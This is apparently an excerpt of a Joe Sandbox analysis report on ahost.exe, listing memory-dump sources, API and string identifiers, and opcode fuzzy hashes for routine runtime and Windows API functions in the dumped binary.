                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: 64ce84591e8c3094fbaacc393b3e614ff5c2b413e64bd879d8eadf6881faf23c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B681D732D0824A85F7646E26AA10278B6B0AB1574CFD64035CB3D877CEFBADA501C3E1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction ID: f805e30144cd7cbf740db8edbab2e0e6c09f88178d103c82a50ef867e4f99ef8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D51B33AE196098BDB54BF15E804A38A3A1EB44B98F944130DA6D477CCDF3CF845C791
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction ID: b3f6f1b638aaccd5ce8becc5c48bb3e38bda516e9ef74176f2622eaf75cfd529
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF519F32E08282C7EB65BF22A844269B6B0EB54B84F944135EE6D477D9DF3CF450C792
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction ID: 0d8095196bdf8dbe1c43056937eb0c7cceaeb45b9e331465f7b1be3da733880d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89617E32908BC582E761AF15F8403AAB7A0FB85784F444235EEAD07B99DF7CE190CB51
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F91E352C,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E7F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction ID: 6f33d833fc90ad13cea2cb3459704e069f6d2a3b83292f2d4f268280d8a8b92b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031B721A19AC146FB21BF10FC507AAA264EF84BE4F840230EE7D437CDDE2CE5058751
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: 4b4a09f05e78ba501f7d2422704cfab75b00c64a95ffc9e326fc8146ff0b2a02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8421A672B08B4182E760AF14FC447EAA364EB88784F800135EE9D936A9DF3CD645C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: b995d14cf994745d34865209235cb9d1d4201b7ba99cab2ff239f339a7baf403
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50D1E172F18A848AE710DF65E8401AC7771FB54798B848235DF6E97BD9EE38E006C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: edcbd4e15d9d6da7310bf1c3debd539de2ac0b37613043e10e6cf010f95aaac0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE51F772F081168AFB14EF25AD556BCABB1AB4035CF900135DE3D93BE9EB78A441C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction ID: bc71f6a46c97314d402491e90189e43e978977f666798dff1eb46f7ef807e040
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B518B22E086458AFB14EFB1A8503BDA3B1BB48B58F944435DF2D976C9EF39D441C7A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: da57125d96bc366e0d0476a6ff76c63da60f2251fdf91eb403472fd68eaead5b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06117321E1814243FB64BF69B95427D9271EB84780FC84430DA6A47BDDCD2DE6958251
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction ID: 400a9f948239cff76c9ed9ceeca87c3b98fe818b1014b88f3b30f1bf36b8fbec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33412B12A0868541FBA4AF16AC0177AD670EF80BA4F944235EF7C86AEDDF3DD441C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F90B6
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F91ECC15), ref: 00007FF7F91F90D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-1499232478
                                                                                                                                                                                                                              • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction ID: adc4a53bb395f10b9034431e5b2439fc78f3c81fb0db11b6ff468e0c5712f581
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4415F32E08A4685FB54BF25AC400B8A6B4EB447D8BD54035EB6E477CDEE3DE44183A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction ID: 908476807976353adf4b453babdfbc084a1d334f8dbb5a8bdd553b699048266d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9441B432B19A4581EB60AF25F8443ADA771FB88794F804031EE6D87B98EF3CD401CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction ID: 5bb81c8b85d3395f77290db51f4e3511d13725c8bf99afbafa521d9bab351c51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2221B422E0868582FB20AF16E84426DA3B1FB84B48FD54035D7BD437D8EFBCE545C6A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: cb0449f0d956bc6644817e4d5775ea5f04d8714c14a6814dce1047c97642e9ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21115E32A08B8182EB619F16F800259B7F0FB88B84F984230EE9D077A9DF3CD551CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
